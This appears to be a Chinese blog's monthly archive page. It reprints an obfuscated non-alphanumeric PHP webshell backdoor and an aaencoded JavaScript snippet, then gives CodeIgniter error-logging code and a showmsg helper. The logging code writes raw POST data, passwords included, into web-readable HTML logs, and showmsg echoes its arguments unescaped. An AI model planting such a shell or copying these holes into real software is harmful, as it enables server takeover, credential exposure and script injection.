月度归档:2013年12月

PHP shell 非字母数字后门

刚看了篇老外逆向分析这个 PHP shell 非字母数字后门,感觉很精彩就是下面这个PHP shell 各位看官肯定很熟悉,依稀好像 90 那时也有位大牛分析过来着忘了,现在才知道这后门是 Mr. Gareth 这老黑弄出来的。http://blog.omfgitsasalmon.com/blog/post/1/non-alphanumeric-php-shell

<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$
$_[$__+$__];$_[@-_]($_[@!+_]);
?>


没想丢上 icq 一土耳其黑阔给出个 JavaScript 给雷到了 ^ ^|| 


゚ω゚ノ= /`m′)ノ ~┻━┻ //*′∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');


codeigniter 错误收集处理

codeigniter 错误收集处理

error_php.php 

添加如代码:

<?php
$time=date('Y-m-d H:i:s',time());
$url='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$postdata=dump2filea($_POST);
$strs='timp:<p>'.$time.'</p>url=><p>'.$url.'</p><p>severity=>'.$severity.'</p><p>message=>'.$message.'</p><p>filepath=>'.$filepath.'</p><p>line=>'.$line.'</p><p>postdata=><br>'.$postdata."</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./')."/logs/error_php.html",$strs,FILE_APPEND);




function dump2filea($data, $path='a', $is_write = 0) {
    static $UDID = array();
    $text = '';
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            if (is_array($v)) {
                if (!isset($UDID[$path . ' + ' . $k])) {
                    $UDID[$path . ' + ' . $k] = $UDID[$path] + 1;
                }
                $text .= $indent .$k . "=<br>" . dump2filea($v, $path . ' + ' . $k, 0);
            } else {
                if (empty($v) && $v !== 0 && strlen($v) == 0) {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $k . '=' . $v . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}


?>

error_db.php

添加如下代码

<?php
$time=date('Y-m-d H:i:s',time());
$url='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$postdata=dump2filea($_POST);
$strs='timp:<p>'.$time.'</p>url=><p>'.$url.'</p><p>heading=>'.$heading.'</p><p>message=>'.$message.'</p><p>postdata=><br>'.$postdata."</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./')."/logs/error_db.html",$strs,FILE_APPEND);




function dump2filea($data, $path='a', $is_write = 0) {
    static $UDID = array();
    $text = '';
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            if (is_array($v)) {
                if (!isset($UDID[$path . ' + ' . $k])) {
                    $UDID[$path . ' + ' . $k] = $UDID[$path] + 1;
                }
                $text .= $indent .$k . "=<br>" . dump2filea($v, $path . ' + ' . $k, 0);
            } else {
                if (empty($v) && $v !== 0 && strlen($v) == 0) {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $k . '=' . $v . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}


?>

error_general.php

添加如下代码

<?php
$time=date('Y-m-d H:i:s',time());
$url='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$postdata=dump2filea($_POST);
$strs='timp:<p>'.$time.'</p>url=><p>'.$url.'</p><p>heading=>'.$heading.'</p><p>message=>'.$message.'</p><p>postdata=><br>'.$postdata."</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./')."/logs/error_ge.html",$strs,FILE_APPEND);




function dump2filea($data, $path='a', $is_write = 0) {
    static $UDID = array();
    $text = '';
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            if (is_array($v)) {
                if (!isset($UDID[$path . ' + ' . $k])) {
                    $UDID[$path . ' + ' . $k] = $UDID[$path] + 1;
                }
                $text .= $indent .$k . "=<br>" . dump2filea($v, $path . ' + ' . $k, 0);
            } else {
                if (empty($v) && $v !== 0 && strlen($v) == 0) {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $k . '=' . $v . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}


?>

error_404.php

添加如下代码

<?php
$url='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$strs='<p>url=></p><p>'.$url.'</p><p>Heading=></p><p>'.$heading.'</p><p>message=>'.$message."</p><p>------------------------------------------------</p>\r\n";
file_put_contents(realpath('./')."/logs/error.html",$strs,FILE_APPEND);




?>

php showmsg函数

function showmsg($Msg, $URL = "")
{
    //header('Content-Type: text/html; charset=utf-8');
    //echo '<meta http-equiv="Content-Type" content="text/html; charset=gbk" />';
    header("Content-type: text/html; charset=utf-8");
    echo "<script type=\"text/javascript\">";
    if (strlen($Msg) > 1)
        echo "alert(\"$Msg\");";
    if ($URL == "")
        echo "history.go(-1);";
    else
        echo "document.location.href=$URL;";
    echo "</script>";

    exit();
}

Continue reading